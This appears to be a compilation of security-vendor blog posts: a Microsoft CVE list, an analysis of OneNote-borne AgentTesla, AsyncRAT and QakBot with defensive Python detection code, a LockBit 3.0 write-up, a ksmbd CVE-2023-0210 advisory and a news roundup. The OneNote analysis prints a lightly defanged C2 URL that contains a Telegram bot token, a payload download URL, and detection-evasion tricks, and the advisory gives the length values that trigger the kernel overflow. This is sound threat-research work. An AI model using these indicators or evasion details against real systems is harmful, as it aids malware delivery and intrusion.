ASPY 407: Malicious-exe exe.MP_301

The following vulnerabilities do not have exploits in the wild:
CVE-2023-21528 Microsoft SQL Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21553 Azure DevOps Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21564 Azure DevOps Server Cross-Site Scripting Vulnerability
There are no known exploits in the wild.
CVE-2023-21566 Visual Studio Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-21567 Visual Studio Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-21568 Microsoft SQL Server Integration Service (VS extension) Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21570 Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability
There are no known exploits in the wild.
CVE-2023-21571 Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability
There are no known exploits in the wild.
CVE-2023-21572 Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability
There are no known exploits in the wild.
CVE-2023-21573 Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability
There are no known exploits in the wild.
CVE-2023-21684 Microsoft PostScript Printer Driver Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21685 Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21686 Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21687 HTTP.sys Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-21691 Microsoft Protected Extensible Authentication Protocol (PEAP) Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-21693 Microsoft PostScript Printer Driver Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-21694 Windows Fax Service Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21695 Microsoft Protected Extensible Authentication Protocol (PEAP) Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21697 Windows Internet Storage Name Service (iSNS) Server Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-21699 Windows Internet Storage Name Service (iSNS) Server Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-21700 Windows iSCSI Discovery Service Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-21701 Microsoft Protected Extensible Authentication Protocol (PEAP) Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-21702 Windows iSCSI Service Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-21703 Azure Data Box Gateway Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21704 Microsoft ODBC Driver for SQL Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21705 Microsoft SQL Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21707 Microsoft Exchange Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21710 Microsoft Exchange Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21713 Microsoft SQL Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21714 Microsoft Office Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-21716 Microsoft Word Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21717 Microsoft SharePoint Server Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-21718 Microsoft SQL ODBC Driver Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21721 Microsoft OneNote Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2023-21722 .NET Framework Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-21777 Azure App Service on Azure Stack Hub Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-21778 Microsoft Dynamics Unified Service Desk Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21797 Microsoft ODBC Driver Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21798 Microsoft ODBC Driver Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21799 Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21800 Windows Installer Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-21801 Microsoft PostScript Printer Driver Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21802 Windows Media Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21803 Windows iSCSI Discovery Service Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21804 Windows Graphics Component Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-21805 Windows MSHTML Platform Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21806 Power BI Report Server Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2023-21807 Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability
There are no known exploits in the wild.
CVE-2023-21808 .NET and Visual Studio Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21809 Microsoft Defender for Endpoint Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2023-21811 Windows iSCSI Service Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-21813 Windows Secure Channel Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-21815 Visual Studio Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21816 Windows Active Directory Domain Services API Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-21817 Windows Kerberos Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-21818 Windows Secure Channel Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-21819 Windows Secure Channel Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-21820 Windows Distributed File System (DFS) Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21822 Windows Graphics Component Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-23377 3D Builder Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-23378 Print 3D Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-23379 Microsoft Defender for IoT Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-23381 Visual Studio Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-23382 Azure Machine Learning Compute Instance Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-23390 3D Builder Remote Code Execution Vulnerability
There are no known exploits in the wild.

Microsoft OneNote files are widely used to deliver malware payloads

There is a never-ending race between threat actors and security software. Malware authors constantly look for techniques that slip past active defenses to gain access to a victim's machine, and one of them is switching to low-profile file types to carry the malicious payload. Malware authors are now using OneNote files, which were rarely used for malicious purposes in the past. For the last few weeks, SonicWall RTDMI has detected a spike in malicious OneNote files delivered to victims' machines as email attachments. The SonicWall threat research team observed these OneNote files delivering AgentTesla, AsyncRAT and QakBot. Threat actors attach HTML Application (HTA) files, batch files and Portable Executable (PE) files to the OneNote page and hide the attachments behind an image. The image displays a message luring the victim to click on it; the hidden attachment sits beneath the image, so the click triggers execution of the malware.
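As an added example (not SonicWall's tooling, and not code from the campaign), the following Python script carves every file attachment out of a .one file and flags the types that execute on a click. It relies on the FileDataStoreObject layout from the MS-ONESTORE specification (a fixed GUID header, a 64-bit length, padding, the file bytes and a GUID footer); the .one sample it scans is constructed inline, and the type-sniffing heuristic is an assumption kept deliberately simple.

```python
"""Carve file attachments out of a OneNote (.one) file and flag risky types.

Added example, not SonicWall's tooling. The record layout is the
FileDataStoreObject structure from the MS-ONESTORE specification; the
sample file at the bottom is constructed here, not a real attachment.
"""
import struct
import uuid

# FileDataStoreObject: guidHeader, cbLength (u64 LE), unused (4), reserved (8),
# FileData (cbLength bytes), guidFooter. GUIDs are stored little-endian.
GUID_HEADER = uuid.UUID("BDE316E7-2665-4511-A4C4-8D4D0B7A9EAC").bytes_le
GUID_FOOTER = uuid.UUID("71FBA722-0F79-4A0B-BB13-899256426B24").bytes_le
ONE_FILE_MAGIC = uuid.UUID("7B5C52E4-D88C-4DA7-AEB1-5378D02996D3").bytes_le
HEADER_LEN = 16 + 8 + 4 + 8

RISKY_TYPES = {"pe", "hta/html", "batch"}


def classify(data: bytes) -> str:
    """Cheap content sniffing; OneNote stores no trusted type for an attachment."""
    head = data[:512]
    low = head.lower()
    if head.startswith(b"MZ"):
        return "pe"
    if head.startswith(b"\x89PNG\r\n\x1a\n") or head.startswith(b"\xff\xd8\xff"):
        return "image"
    if head.startswith(b"%PDF"):
        return "pdf"
    if b"<html" in low or b"<script" in low or b"hta:application" in low:
        return "hta/html"
    if low.lstrip().startswith(b"@echo") or b"powershell" in low or b"%~dp0" in low:
        return "batch"
    return "unknown"


def carve_attachments(blob: bytes) -> list:
    """Return one dict per embedded file found in the .one image."""
    found = []
    pos = blob.find(GUID_HEADER)
    while pos != -1 and pos + HEADER_LEN <= len(blob):
        (cb_length,) = struct.unpack_from("<Q", blob, pos + 16)
        start = pos + HEADER_LEN
        end = start + cb_length
        # A corrupt or hostile length must never make us read past the buffer.
        if cb_length == 0 or end > len(blob):
            pos = blob.find(GUID_HEADER, pos + 1)
            continue
        data = blob[start:end]
        found.append({
            "offset": pos,
            "size": cb_length,
            "type": classify(data),
            "footer_ok": blob[end:end + 16] == GUID_FOOTER,
            "data": data,
        })
        pos = blob.find(GUID_HEADER, end)
    return found


def risky_attachments(records: list) -> list:
    """Records carrying executable content that a user click would run."""
    return [r for r in records if r["type"] in RISKY_TYPES]


def build_object(payload: bytes) -> bytes:
    """Serialize one FileDataStoreObject (used only to construct the sample)."""
    return (GUID_HEADER + struct.pack("<Q", len(payload)) + b"\x00" * 4 + b"\x00" * 8
            + payload + GUID_FOOTER)


# Constructed sample: decoy image, lure HTA hidden under it, and a PE stub.
SAMPLE_ONE = (
    ONE_FILE_MAGIC
    + build_object(b"\x89PNG\r\n\x1a\n" + b"\x00" * 32)
    + b"\x00" * 16
    + build_object(b"<html><head><hta:application id='lure'/></head>"
                   b"<script language='VBScript'>window.close()</script></html>")
    + build_object(b"MZ" + b"\x90" * 62 + b"PE\x00\x00" + b"\x00" * 32)
)


if __name__ == "__main__":
    for rec in carve_attachments(SAMPLE_ONE):
        flag = "RISKY" if rec["type"] in RISKY_TYPES else "ok"
        print(f"offset={rec['offset']:#x} size={rec['size']} type={rec['type']} {flag}")
```

Run it against a real attachment with carve_attachments(open(path, "rb").read()); an object typed pe, hta/html or batch sitting next to an image object is the lure pattern described above. The bounds check on cbLength matters: a hostile file can declare any length, and a carver that trusts it reads past the buffer.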

Case 1 (Payload: AgentTesla)

The threat actor attaches a malicious HTML Application (HTA) file to the OneNote page and duplicates the attachment reference to widen the area a click will land on. The attachment is hidden by overlapping two images: a blurred document image, with a second image on top of it asking the user to "View Document". Clicking the image triggers execution of the hidden HTA file.

The HTA file launches two PowerShell instances: one displays an image fetched from the web, the other downloads and executes the AgentTesla malware on the victim's machine.

The blurred HSBC document fetched from the web is displayed to mislead the user while the malicious activity runs in the background.

The second PowerShell instance starts the downloaded executable in the background; that executable runs a VBScript file and injects the AgentTesla payload into RegSvcs.exe. The injected payload exfiltrates user data to a Telegram-hosted command and control (C2) endpoint, h[t][t]ps://api.telegram.org/bot5729374237:AAEdSD-W5rWlJyyU5nwVKvjLxJBT1jTdKRY/.

Case 2 (Payload: AsyncRAT)

The threat actor attaches an obfuscated batch file to the OneNote page. The attachment is hidden behind an image asking the user to "Click to view document", and the page's background image shows the text DHL WORLDWIDE EXPRESS so that it passes as a delivery document.

The obfuscated batch file drops a copy of the PowerShell executable into the OneNote temp folder under the name "invoice.bat.exe" and uses that renamed copy to run a PowerShell script, which sidesteps detections that key on the powershell.exe process name.

The PowerShell script reads data from the batch file and decrypts it. The decrypted data is decompressed to obtain the AsyncRAT executable, which is then executed.

AsyncRAT is a widely known malware family whose source code is available on GitHub.

In another AsyncRAT-delivering variant, the OneNote page carries an executable attachment that drops a batch file to continue the chain, which ends with AsyncRAT running on the victim's machine.

Case 3 (Payload: QakBot)

The threat actor attaches a batch command file to the OneNote page. The attachment is hidden behind an image asking the user to "Open", and the page also contains an image with the text "This document contains attachments from the cloud, to receive them, double click "open"".

The batch command file runs PowerShell, which drops a second batch file to C:\Users\Public\aSUNY81.cmd and executes it with two arguments.

The dropped script downloads the QakBot payload from h[t][t]ps://famille2point0.com/oghHO/01.png, the URL passed as the second argument. The QakBot Dynamic Link Library (DLL) is executed by calling its export function Wind.

QakBot injects its payload into iexplore.exe using process injection. The binary uses the traditional method: it starts iexplore.exe in suspended mode with the CreateProcess API, allocates memory in the new process and writes the payload into it. After writing the code, most malware points the main thread at the injected code by changing the instruction pointer (EIP) with the SetThreadContext API; QakBot instead overwrites the bytes at the current EIP with a jump into the injected code, so a detection that keys only on SetThreadContext misses it.
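To make that detection point concrete, here is an added example in Python (not SonicWall's signature logic) that scans a sandbox-style API trace for the suspended-create, allocate, write, resume sequence and labels which hand-off variant was used: a SetThreadContext call, or a tiny write outside the newly allocated region, which is the entry-point patch described above. The trace format ("<caller pid> <api> key=value ...") and the sample lines are constructed for this example; field names such as child=, tid= and protect= are assumptions to adapt to whatever your sandbox or EDR emits.

```python
"""Flag suspended-process injection in a sandbox API trace, including the
variant that patches the entry point instead of calling SetThreadContext.

Added example, not SonicWall's detection logic. The trace format and the
sample lines are constructed for this example.
"""
import re

LINE_RE = re.compile(r"^(?P<pid>\d+)\s+(?P<api>\w+)\s*(?P<args>.*)$")
ARG_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')

CREATE_SUSPENDED = 0x00000004   # dwCreationFlags bit
PAGE_EXECUTE_MASK = 0xF0        # PAGE_EXECUTE* protections are 0x10/0x20/0x40/0x80
PATCH_MAX_BYTES = 16            # a jmp or push/ret stub, not a payload


def parse_line(line: str):
    """Parse one trace line into (caller pid, api name, {arg: value})."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    args = {k: v.strip('"') for k, v in ARG_RE.findall(m.group("args"))}
    return int(m.group("pid")), m.group("api"), args


def _new_target(parent, image, suspended):
    return {"parent": parent, "image": image, "suspended": suspended,
            "exec_regions": [], "writes": [], "set_ctx": False, "resumed": False}


def detect_injection(lines):
    """Return one alert per child process that matches the injection pattern."""
    targets = {}        # child pid -> state
    thread_owner = {}   # primary tid -> child pid
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        caller, api, a = rec
        if api == "CreateProcessW":
            child = int(a["child"])
            flags = int(a.get("flags", "0"), 16)
            targets[child] = _new_target(caller, a.get("image", ""),
                                         bool(flags & CREATE_SUSPENDED))
            thread_owner[int(a["tid"])] = child
        elif api == "VirtualAllocEx":
            t = targets.get(int(a["pid"]))
            if t and int(a["protect"], 16) & PAGE_EXECUTE_MASK:
                t["exec_regions"].append((int(a["addr"], 16), int(a["size"], 16)))
        elif api == "WriteProcessMemory":
            t = targets.get(int(a["pid"]))
            if t:
                t["writes"].append((int(a["addr"], 16), int(a["size"], 16)))
        elif api == "SetThreadContext":
            t = targets.get(thread_owner.get(int(a["tid"])))
            if t:
                t["set_ctx"] = True
        elif api == "ResumeThread":
            t = targets.get(thread_owner.get(int(a["tid"])))
            if t:
                t["resumed"] = True

    alerts = []
    for child, t in targets.items():
        if not (t["suspended"] and t["exec_regions"] and t["resumed"]):
            continue

        def in_exec(addr, regions=t["exec_regions"]):
            return any(lo <= addr < lo + size for lo, size in regions)

        payload_writes = [w for w in t["writes"] if in_exec(w[0])]
        # A tiny write outside the new region is the entry-point patch variant.
        patch_writes = [w for w in t["writes"]
                        if not in_exec(w[0]) and w[1] <= PATCH_MAX_BYTES]
        if not payload_writes:
            continue
        if t["set_ctx"]:
            variant = "SetThreadContext hijack"
        elif patch_writes:
            variant = "entry-point patch"
        else:
            continue
        alerts.append({"parent": t["parent"], "child": child,
                       "image": t["image"], "variant": variant})
    return alerts


# Constructed trace: one SetThreadContext-style injection, one entry-point
# patch, and a benign non-suspended process start that must not alert.
SAMPLE_TRACE = """
1001 CreateProcessW image="C:\\Program Files\\Internet Explorer\\iexplore.exe" flags=0x00000004 child=2001 tid=2002
1001 VirtualAllocEx pid=2001 addr=0x00500000 size=0x00020000 protect=0x40
1001 WriteProcessMemory pid=2001 addr=0x00500000 size=0x0001f400
1001 SetThreadContext tid=2002
1001 ResumeThread tid=2002
3001 CreateProcessW image="C:\\Program Files\\Internet Explorer\\iexplore.exe" flags=0x00000004 child=4001 tid=4002
3001 VirtualAllocEx pid=4001 addr=0x02a10000 size=0x0002c000 protect=0x40
3001 WriteProcessMemory pid=4001 addr=0x02a10000 size=0x0002b5a0
3001 WriteProcessMemory pid=4001 addr=0x00f31250 size=0x5
3001 ResumeThread tid=4002
5001 CreateProcessW image="C:\\Windows\\System32\\notepad.exe" flags=0x00000000 child=6001 tid=6002
5001 ResumeThread tid=6002
""".strip().splitlines()


if __name__ == "__main__":
    for alert in detect_injection(SAMPLE_TRACE):
        print(alert)
```

The rule anchors on the suspended create plus an executable remote allocation and a resume, and treats SetThreadContext as one of two hand-off signals rather than a requirement; dropping the second branch is exactly what lets the variant described above through.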

 

IOCs

SHA256 OneNote files:

8fc8a2b79cb0c0f8113993056e682cd9b56140781cad6bfeabfeac8e6df543e1

1d27ed598f1eab480f067c8920d8f9cd7f7da8b1833d0f58f75d2e2944589210

0a001cf1fd5f6d6994a1635f87493723ba6c6299b67fdf1569c341c87b8aeda1

 

SHA256 PE files:

b75aad495d0bff2f1b5a2b89a8df42a9257f1f01394c859f3ad2bb40d91607d3

a18402d77acd4d9c8b9ae637ffb8ef44b566c777902bb95d81a8cb6c23fec9e7

53a1cbccdb9988dca39ce32963a951b4f8b9d843db57c288195e1cd160bd7f17

 

 

The OneNote files were not available on popular threat intelligence sharing portals such as VirusTotal and ReversingLabs at the time of analysis, which indicates their uniqueness and limited distribution.

 

Evidence of detection by the RTDMI™ engine can be seen in the Capture ATP report for this file.

 

LockBit 3.0 'Black' targets large corps. Operator demands $9M for decryption

LockBit 3.0, also known as LockBit Black, is a ransomware family operated under the Ransomware-as-a-Service (RaaS) model, in which the developers partner with affiliates who may lack the resources to build and deploy attacks themselves. The family is known for its public presence: it announced its services in July 2022, ran a bug bounty program and even offered money to individuals who got the LockBit logo tattooed on their bodies. Despite the attention, LockBit remains one of the most prevalent ransomware strains, and in September 2022 the builder for the ransomware was leaked and made available for download on GitHub. During our analysis we were able to engage in a direct conversation with the operator, who demanded a staggering $9M for file decryption.

 

Infection Cycle:

 

Upon infection, files on the system are encrypted. Each encrypted file is given a ".NegNiNNoP" extension and file names are obfuscated, e.g. 4sk2dwe.NegNiNNoP. After encryption, the following message is displayed as the desktop background.

 

The following files are added to the system:

  • C:\ProgramData\NegNiNNoP.bmp [seen above]
  • C:\ProgramData\NegNiNNoP.ico
  • C:\Users\NegNiNNoP.README.txt
  • C:\Users\All Users\NegNiNNoP.bmp
  • C:\Users\All Users\NegNiNNoP.ico
  • C:\Users\{user}\NegNiNNoP.README.txt

 

The following registry key is added:

  • HKEY_CLASSES_ROOT\NegNiNNoP\DefaultIcon @ “C:\ProgramData\NegNiNNoP.ico”

 

NegNiNNoP.ico contains the following image:

 

A file called NegNiNNoP.README.txt is written to the desktop and to every folder where files were encrypted. It contains the ransom message.

 

The message contains a Tor address that leads the victim to the operators' site.

 

The operators take pride in their work and display a list of victims on their site, filled with organizations from around the world.

 

In addition to demanding payment for data recovery, the operators double down and threaten to leak sensitive data to the public if the ransom is not paid in time. This double extortion adds pressure on the victim to pay. Leaked data is publicly available on the site for all to see.

 

 

During our analysis, no data was exfiltrated from the system.

 

On the victim page, a "support" chat box is presented, enabling direct communication with the attackers. Ransomware operators typically use it to negotiate with victims and to apply additional pressure.

 

We had the following live conversation with an operator revealing a $9M decryption fee:

 

The link took us to the following pages.  However, the files referenced were not from our network:

 

This appears to be a bug on their end:

 

 

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: LockBit3.RSM (Trojan)

This threat is also detected by SonicWall Capture ATP w/RTDMI and the Capture Client endpoint solutions.

Linux Kernel ksmbd Integer Underflow Vulnerability

Overview:

  SonicWall Capture Labs Threat Research Team has observed the following threat:

  ksmbd is an in-kernel SMB server: a Linux kernel module that implements the SMB3 protocol so that the kernel itself can serve SMB (Server Message Block) clients. SMB is the protocol used for sharing files, printers and other resources between computers on a network.

  SMBv3 is the latest version of the protocol and provides several new features and improvements over previous versions, including better security features such as encryption, improved performance, and better support for large files and high-availability scenarios.

  KSMBD enables the Linux kernel to directly handle SMB requests, eliminating the need for a user-space daemon to translate the requests into kernel calls. This results in improved performance and lower overhead compared to traditional SMB implementations that rely on user-space daemons.

  A denial of service vulnerability has been reported in the Linux kernel. The vulnerability is due to an integer underflow in the ksmbd_decode_ntlmssp_auth_blob function.

  A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in denial of service.


CVE Reference:

  This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2023-0210.


Common Vulnerability Scoring System (CVSS):

  The overall CVSS score is 6.7 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O/RC:C).

  Base score is 7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H), based on the following metrics:
    • Attack vector is network.
    • Attack complexity is low.
    • Privileges required is none.
    • User interaction is none.
    • Scope is unchanged.
    • Impact of this vulnerability on data confidentiality is none.
    • Impact of this vulnerability on data integrity is none.
    • Impact of this vulnerability on data availability is high.
  Temporal score is 6.7 (E:P/RL:O/RC:C), based on the following metrics:
    • The exploit code maturity level of this vulnerability is proof of concept.
    • The remediation level of this vulnerability is official fix.
    • The report confidence level of this vulnerability is confirmed.


Technical Overview:

  NTLMSSP is Microsoft's NTLM authentication protocol (documented in MS-NLMP). It involves the exchange of a series of messages (NEGOTIATE, CHALLENGE, AUTHENTICATE) between client and server to establish the client's identity. In SMB2 SESSION_SETUP these messages travel inside a SPNEGO (GSS-API) security blob, which is encoded in ASN.1 (Abstract Syntax Notation One) using the DER (Distinguished Encoding Rules) format; the NTLMSSP messages themselves are flat binary structures whose variable-length fields are described by (Length, MaximumLength, BufferOffset) descriptors pointing into a payload area. Understanding this layout, and in particular that the server trusts those descriptors, is important for understanding this vulnerability.

  An integer underflow exists in the ksmbd kernel module when handling SMB2 SESSION_SETUP messages. Specifically, the flaw is due to missing validation when processing NTLMSSP authentication messages. The vulnerable function ksmbd_decode_ntlmssp_auth_blob() handles the NTLMSSP AUTHENTICATE message: it reads the Length field of the NtChallengeResponse descriptor into a local variable nt_len and passes nt_len - CIFS_ENCPWD_SIZE (16) as the blen argument of ksmbd_auth_ntlmv2(). That function allocates a kernel buffer of blen + CIFS_CRYPTO_KEY_SIZE (8) bytes and performs two memory copies into it, of CIFS_CRYPTO_KEY_SIZE and blen bytes respectively.

  However, the vulnerable function does not check whether nt_len is smaller than CIFS_ENCPWD_SIZE (16). Any value below 16 makes the subtraction underflow; for the allocation to succeed, the value must lie in the range 8-15. For example, if nt_len is 12, blen becomes -4 and the allocation size is 4, and the subsequent copies of 8 bytes and of 0xFFFFFFFC bytes (-4 reinterpreted as an unsigned size) both overflow the buffer.

Triggering the Problem:

    • The vulnerable system must be listening on the SMB port (445/tcp) and accept incoming connections.
  • The attacker must have connectivity to the target system.
  • The attacker must know a valid SMB user name on the target system.

Triggering Conditions:

  The attacker connects to the target ksmbd server. The vulnerability is triggered when the attacker sends a crafted SMB2 SESSION_SETUP request with crafted Security Blob field.

Attack Delivery:

  The following application protocols can be used to deliver an attack that exploits this vulnerability:
    • SMB/CIFS

  

SonicWall's Intrusion Prevention System (IPS) provides protection against this threat:

  • IPS: 3510 Linux Kernel ksmbd DoS 1

Remediation Details:

  The risks posed by this vulnerability can be mitigated or eliminated by:
    • Configure the vulnerable product to allow access to trusted clients only.
    • Update to a non-vulnerable version of the product.
    • Filter attack traffic using the signature above.
  The vendor has released a fix commit for this vulnerability; see the vendor advisory.

Cybersecurity News & Trends – 02-10-2023

Curated cybersecurity news and trends from the industry’s leading bloggers and news outlets, for you from SonicWall.

Winter is rolling on, and SonicWall is still plowing its way into headlines. ITPro cited our data while discussing major ransomware strains. Our Director of Regional Sales in LATAM, Arley Brogiato, spoke with GQ Brasil. We congratulate SonicWall’s Jason Carter and Matt Brennan for earning 2023 CRN Channel Chief Recognition.

In industry news, Bleeping Computer reported on a grocery delivery service breach that affected over 1 million customers and on a Canadian bookstore that suffered a major attack. Dark Reading told the tale of an ethical hacker gaining control of Toyota's internal systems. Ransomware is running loose on an unpatched VMware product, according to Hacker News. IT Security Guru reported on an attack by the notorious LockBit ransomware gang that halted London stock trading.

Remember to keep your passwords close and your eyes peeled — cybersecurity is everyone’s responsibility.

SonicWall News

Ryuk, Conti Ransomware Members Hit with UK Sanctions in Latest Crackdown

ITPro, SonicWall News: In 2020 – the third year of it being considered a major strain – security firm SonicWall revealed it was behind a third of ransomware attacks worldwide for the year.

Global Hacker Attack May Reach Brazil but Risk Is Limited, Says Experts

GQ Brasil, SonicWall News: Arley Brogiato, director for Latin America and the Caribbean of the multinational security company SonicWall, does not exclude the possibility of these attacks reaching Brazilian companies, but says he is surprised by the alerts and the spread of the news, which on the morning of last Monday (6) competed with football schedules and the price of cooking gas in Manaus among the most searched topics on Google Trends.

SonicWall’s Jason Carter and Matt Brennan Earn 2023 CRN Channel Chief Recognition

SonicWall Blog, SonicWall News: SonicWall Chief Revenue Officer (CRO) Jason Carter and Vice President Americas Channel Sales Matt Brennan have been named to CRN’s 2023 Channel Chiefs list. Every year, CRN honors the IT channel executives who drive the channel success and evangelize the importance of channel partnerships within the IT industry.

Challenges For Startups in The IoT Sector

TechToday, SonicWall News: According to a report by SonicWall, 2.8 billion malware attacks were registered, up 11% in the first half of 2022, marking the first increase in global malware volume in over three years.

JD Sports Cyber Attack: Why Online Retail Is Vulnerable and What Can Be Done?

Charged Retail, SonicWall News: The JD Sports incident is yet another example of the rise in cyberattack incidents, with the retail industry experiencing a 90% increase in ransomware attacks last year, according to a report from SonicWall.

The Best Hardware Firewalls for Small Businesses

Ask by Geeks, SonicWall News: One of the best small business firewalls is the SonicWall TZ400 Security Firewall. The SonicWall TZ400 NGFW Premium is considered a little more expensive than other firewall options, but its security, reliability, ease of use, and unique features justify its price.

10 million Customers Exposed in JD Sports Cyber Attack

ITPro, SonicWall News: A study last year by SonicWall found that the retail sector saw a 264% surge in ransomware attacks between February 2021 and 2022. The widespread consumer shift to online shopping during the pandemic prompted hackers to escalate attacks against online retailers.

Three Ways Governments Can Better Protect Public Data

Networking+, SonicWall News: The chances of being hit by a ransomware attack are more significant than ever. Last year, global ransomware volume skyrocketed by 105% year over year, according to the 2022 SonicWall Cyber Threat Report. While no industry was spared, the numbers were particularly gruesome for governments. Ransomware attempts on government entities rose a staggering 1,885%. That’s more than double the increase reported by healthcare (755%), education (152%), and retail (21%) combined.

2023 Predictions: Emerging Tech & Global Conflict Bring New Cyber Threats

CyberSecurityInsiders, SonicWall News: 2022 saw a shifting cybersecurity landscape as rising geopolitical conflicts brought new tactics, targets, and goals for cybercrime. According to recent threat intelligence from SonicWall, global ransomware attempts declined 31% YoY as cybercriminals and nation-state actors opted for never-before-seen malware variants, IoT malware, and cryptojacking in attacks motivated by financial gain and state-sponsored hacktivism.

Cybersecurity ‘More Critical Than Ever’ In Era of Connected Care: BD

MedTechDive, SonicWall News: Ransomware attacks in which cybercriminals attempt to extort money declined by 23% overall during the first half of 2022 but increased 328% in healthcare, according to data from cybersecurity company SonicWall.

IT Services Industry Looks to Cyber, Cloud Consulting for Growth

TechTarget, SonicWall News: Logically’s MSSP offerings include extended detection and response, endpoint detection and response, and MDR; enterprise-level managed firewall services; and cybersecurity assessments, according to Skeens. The company runs a SOC. The company’s IT security technology partners include SonicWall.

The Sonicwall NSsp 15700 Brings Serious Network Protection Super Powers

iTWire, SonicWall News: iTWire really could go on and on; the list of features is almost endless. There is a database of applications for intelligent packet analysis, support for IoT devices, DNS protection, and more. However, the best thing right now is to take it for a spin yourself. You can demo the SonicWall NSsp series firewalls online without any installation or commitment and see all the features and benefits in action.

Royal Mail ‘Cyber Incident’ Causes Widespread Disruption

Strategic Risk, SonicWall News: There were 623 million ransomware attacks globally in 2021 according to SonicWall, representing a 105% year on year increase. The UK saw a 228% surge and a 65% increase in never-seen-before malware.

Industry News

Weee! Grocery Service Discloses Data Breach Affecting Over 1 million Customers

The self-proclaimed largest Asian and Hispanic grocery delivery service in North America, Weee!, lost the personal data of 1.1 million customers in a recent breach. According to Bleeping Computer, a threat actor using the handle 'IntelBroker' began leaking data from Weee! on a data breach forum. The leak contained customers' names, phone numbers, email addresses, device types, order notes and other data. Weee! does not retain customer payment information in its databases, so no payment data was lost. Weee! stated that it would individually notify every customer whose information was exposed.

Cyberattack Disrupts London Stock Trading

A ransomware attack brought London stock trading to a screeching halt last week. The LockBit ransomware group targeted Ion Markets, a financial data group that supports a large share of derivatives trading in the London market. According to IT Security Guru, 42 clients were affected, and the attack forced some firms to process trades manually. LockBit allegedly used its signature ransomware, which locks victims out of their data through encryption and leaves a note demanding payment. The company said all affected servers have been disconnected and that it is working to resolve the issue.

Hacker Gains SysAdmin Privileges to Toyota Through Portal Flaw

